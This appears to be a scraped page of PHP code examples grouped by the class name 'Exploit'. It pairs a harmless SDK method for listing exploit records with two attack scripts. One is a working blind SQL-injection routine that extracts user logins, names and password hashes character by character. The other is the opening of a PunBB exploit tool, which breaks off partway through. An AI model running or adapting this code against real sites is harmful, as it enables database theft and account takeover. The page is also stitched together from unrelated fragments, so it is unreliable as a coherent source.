Пример #1
0
 /**
  * Gets a list of exploits from this software
  *
  * @param array $scopes optional
  *
  * @return array List of PatrolSdk\Exploit
  */
 public function exploits($scopes = [])
 {
     if (!$this->id) {
         throw new Exception("The software has no ID, can\\'t get exploits");
     }
     if (!$this->server_id) {
         throw new Exception("The software has no server ID, can\\'t get exploits");
     }
     $exploit = new Exploit($this->patrol);
     $exploit->defaults(['software_id' => $this->id, 'server_id' => $this->server_id]);
     return $exploit->all();
 }
Пример #2
0
    {
        $characters = str_split($this->latinString . $this->specCharString);
        $hash = '';
        $record_length = $this->getLength(1, '(' . $sql . ')');
        for ($i = 1; $i <= $record_length; $i++) {
            foreach ($characters as $char) {
                $injection = "1+and+substring((" . $sql . ")," . $i . ",1)='" . $char . "'";
                $id2 = strlen($injection) + 5;
                $param2 = '&id1=' . $id2;
                $url = $this->url . $injection . $param2;
                if (strpos($out = file_get_contents($url), 'User exists') !== false) {
                    $hash .= $char;
                    continue;
                }
            }
        }
        return $hash;
    }
}
$exploit = new Exploit();
//$exploit->getBySQL("SELECT+string_agg(CONCAT(column_name,'=>',data_type),';')FROM+information_schema.columns+WHERE+table_name='users'");
//$exploit->getBySQL('SELECT+current_database()');
//$exploit->getBySQL('SELECT+version()');
for ($i = 1; $i <= 15; $i++) {
    var_dump('------------------------------');
    var_dump($exploit->getCell($i, 'login'));
    var_dump($exploit->getCell($i, 'first_name'));
    var_dump($exploit->getCell($i, 'last_name'));
    var_dump($exploit->getPassHash($i));
    var_dump('------------------------------');
}
Пример #3
0
    
    -------------------------------------------------------------------
    
    
    Usage:  php [punbb.php] [host/path] [mode]
            php [punbb.php] [host/path] [save]
            php [punbb.php] [host/path] [NULL]
           
   Example:
            php punbb.php localhost/punbb save
            php punbb.php localhost/punbb
          
                   
    NOTE: Don't add me on MSN Messenger
*/
$exploit = new Exploit();
$domain = $argv[1];
$mymode = $argv[2];
$exploit->starting();
$exploit->is_vulnerable($domain);
$exploit->exploiting($domain, $mymode);
class Exploit
{
    function http_request($host, $data)
    {
        if (!($socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP))) {
            echo "socket_create() error!\r\n";
            exit;
        }
        if (!socket_set_option($socket, SOL_SOCKET, SO_BROADCAST, 1)) {
            echo "socket_set_option() error!\r\n";